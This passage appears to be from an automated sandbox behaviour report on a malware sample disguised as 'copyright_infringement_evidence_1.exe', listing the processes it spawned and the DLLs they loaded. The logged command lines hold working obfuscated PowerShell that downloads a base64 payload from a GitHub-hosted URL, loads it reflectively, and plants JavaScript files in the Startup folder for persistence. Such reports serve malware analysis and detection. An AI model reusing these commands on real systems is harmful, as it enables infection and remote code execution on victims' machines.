([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
